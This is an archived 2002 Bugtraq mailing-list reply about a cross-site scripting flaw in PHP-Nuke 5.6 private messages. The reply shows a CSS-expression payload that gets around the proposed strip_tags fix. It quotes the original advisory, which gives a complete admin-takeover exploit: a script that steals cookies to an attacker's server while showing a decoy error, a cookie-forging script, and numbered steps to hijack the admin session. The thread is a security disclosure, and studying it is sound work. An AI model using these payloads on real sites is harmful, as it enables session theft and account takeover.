Re: PHP-Nuke v5.6 - Users can compromise admin accts.
From: Jelmer (jelmer@kuperus.xs4all.nl)Date: 08/16/02
- Previous message: http-equiv@excite.com: "MODERATOR WAIT ! Re: SILLY BEHAVIOR : Internet Explorer 5.5 - 6.0"
- In reply to: <-delusion->: "PHP-Nuke v5.6 - Users can compromise admin accts."
- Next in thread: <-delusion->: "Re: PHP-Nuke v5.6 - Users can compromise admin accts."
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
From: "Jelmer" <jelmer@kuperus.xs4all.nl> To: "<-delusion->" <delusi0n@bellsouth.net>, <bugtraq@securityfocus.com>, <webappsec@secuirtyfocus.com> Date: Fri, 16 Aug 2002 01:08:17 +0200
IMHO this whole email is just stating the obvious. On top of that the
proposed fix is flawed.
The PHP strip_tags function does not strip attributes so this is possible in
your proposed fix :
<a done=false STYLE="visibility : hidden; word-spacing : expression(
!(eval(this.done)) ? location.href='http://kuperus.xs4all.nl' : 0 );
word-wrap : expression(this.done=true);"> test</a>
its a bit messy but gets the job done. It works by using css expressions (a
feature afaik native to Internet explorer) in the style tag.
-- jelmer----- Original Message ----- From: "<-delusion->" <delusi0n@bellsouth.net> To: <bugtraq@securityfocus.com>; <webappsec@secuirtyfocus.com> Sent: Thursday, August 15, 2002 10:30 AM Subject: PHP-Nuke v5.6 - Users can compromise admin accts.
> Tested on PHP-Nuke v5.6 with Mozilla on Linux > (should work on past versions and on most browsers) > > Impact: > --------------------------------------------- > Allows any user to get admin access to a PHP-Nuke site. > > Summary: > ---------------------------------------------- > Due to a XSS flaw in PHPNuke's Private Messaging module, users can send > messages > with html code that will be executed without any filtering. In old PHPNuke > versions > XSS allowed theft of cookies which stored passwords in base64 > encoding. Well PHPNuke version 5.6 encrypts the passwds in md5 before it > encodes it > into base64 and puts it into a cookie. This made stolen cookies useless if > the attacker just > tried decoding the base64 encrypted pass, because he just got the MD5 > encrypted pass. > > Since PHP Nuke encrypts passes in md5 and then matches the encrypted pass > with the > encrypted one in the database, i was able to use the md5 encrypted pass i > got from the > stolen cookie to authenticate myself. > > PHPNuke sets cookies by base64 encoding a string that looks like this: > > username:md5_encrypted_pass:lang > > Since i can get the md5_encrypted pass all i have to do is launch a script > that base64 encodes > a string like the one above, and sets it as a cookie on my box. > > Exploit: > ------------------------------------------------- > For this exploit to work, you must create the following files in your web > server's directory. > > cookie.php containing this: > <? > $fp = fopen("cookie.txt","a"); > fputs($fp, $cookie); > fclose($fp); > print "Message Not Found!"; /* this is so the admin doesnt get scared. and > thinks its some bug. */ > ?> > > test.php containing: > <? > $admin = base64_encode("decoded_string") ; > setcookie("admin","$admin",time()+2592000); > ?> > You will find out what to replace decoded_string with.. > > 1. Send an appealing private message to admin containing > <script>document.location.replace('http://yourserver/cookie.php?cookie='+doc > ument.cookie);</script> > > 2. Wait awhile until the admin checks the message then check cookie.txt on > yer server. > > 3. From cookie.txt.. copy the encrypted text after admin= and before the ; > > 4. go to http://www.isecurelabs.com/base64.php paste the copied text, click > decode it should give u a string like this: > username:md5_encrypted_passwd:language (language may be blank). > > 5. paste the decoded string into test.php like so. > <? > $admin = base64_encode("paste decoded string here"); > setcookie("admin","$admin",time()+2592000); > ?> > > 6. Login as any user on the site > > 7. send private message to self containing: > <iframe src="http://yerserver/test.php"></iframe> > Open the message and a cookie will now be set on yer box, but it will be > configured with your server's URL. > So all u gotta do is replace yer url wit the nuked site. > > 8. for mozilla edit cookies.txt in yer ~/.mozilla/someprofile/something/ > directory replace the url of yer server to the nuked site, > for other browsers just find the Cookie from your server and edit it so > instead of showng your url it shows the url > of the nuked site. > > 9. restart yer browser (close and open up again). go back into the nuked > site and you are now admin. :D > > Temp Solution: > ------------------------------------------------- > Edit reply.php in /modules/Private_Messages/ and make $message be stripped > of html tags. > > Go to line 75 in reply.php and add this line: > > $message = strip_tags($message, '<br><b><u><i>'); > > That will remove any html tags that arent <br><b><u> or <i>. So it will > prevent the XSS. > ------------------------------------------------- > NOTE: I wasnt able to contact the php nuke person, i couldnt find an email > on their site, and when i signed up for membership i never got the password, > so if u can, let them know asap so they can fix this. > > Another Vulnerability Brought to you by, > delusion > http://digital-delusions.dyn.ee > > >
- Previous message: http-equiv@excite.com: "MODERATOR WAIT ! Re: SILLY BEHAVIOR : Internet Explorer 5.5 - 6.0"
- In reply to: <-delusion->: "PHP-Nuke v5.6 - Users can compromise admin accts."
- Next in thread: <-delusion->: "Re: PHP-Nuke v5.6 - Users can compromise admin accts."
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Relevant Pages
|
